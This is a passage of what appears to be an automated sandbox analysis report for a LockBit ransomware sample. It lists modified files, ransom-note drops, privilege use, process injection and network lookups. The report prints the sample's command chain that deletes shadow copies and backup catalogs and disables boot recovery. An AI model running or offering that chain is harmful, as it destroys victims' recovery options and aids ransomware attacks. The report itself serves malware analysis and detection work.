N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalSplashScreen.scale-200_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-150_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-20_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ul-oob.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-24_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-72_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-64_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_MAK_AE-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ShareProvider_CopyFile24x24.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-150.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_BadgeLogo.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-150.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ppd.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Media Player\uk-UA\wmpnscfg.exe.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-96_altform-lightunplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyView.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-ppd.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedAppList.scale-200_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.87d78559.pri	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Money_Received.m4a	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSplashLogo.scale-250.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-100_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_call_mobiles_landlines_v1.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarLargeTile.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklist	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\3px.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL116.XML	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Media Player\de-DE\setup_wm.exe.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Windows Media Player\ja-JP\wmpnssui.dll.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ShareProvider_CopyLink24x24.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-24_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File created	C:\Program Files\Java\jre-1.8\lib\Restore-My-Files.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_HK.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailBadge.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\LockScreenLogo.scale-400.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\az-Latn-AZ\View3d\3DViewerProductDescription-universal.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-16_altform-lightunplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\Restore-My-Files.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-200_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-36_contrast-black.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-ul-oob.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\19.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre-1.8\lib\javafx.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-20_altform-unplated.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-36.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_altform-unplated_contrast-white.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\UninstallSwitch.M2T	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosSmallTile.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019DemoR_BypassTrial180-ppd.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\PowerPivotExcelClientAddIn.tlb	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Checks SCSI registry key(s)

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	C:\Windows\System32\vds.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	C:\Windows\System32\vds.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	C:\Windows\System32\vds.exe	N/A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	C:\Windows\System32\vds.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 36	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: 36	N/A	C:\Windows\System32\Wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\system32\wbengine.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 3976 wrote to memory of 2800	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\System32\cmd.exe
PID 3976 wrote to memory of 2800	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe	C:\Windows\System32\cmd.exe
PID 2800 wrote to memory of 4604	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2800 wrote to memory of 4604	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2800 wrote to memory of 388	N/A	C:\Windows\System32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 2800 wrote to memory of 388	N/A	C:\Windows\System32\cmd.exe	C:\Windows\System32\Wbem\WMIC.exe
PID 2800 wrote to memory of 2916	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 2916	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 4932	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 4932	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 1372	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\wbadmin.exe
PID 2800 wrote to memory of 1372	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\wbadmin.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	204.79.197.237:443	g.bing.com	tcp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
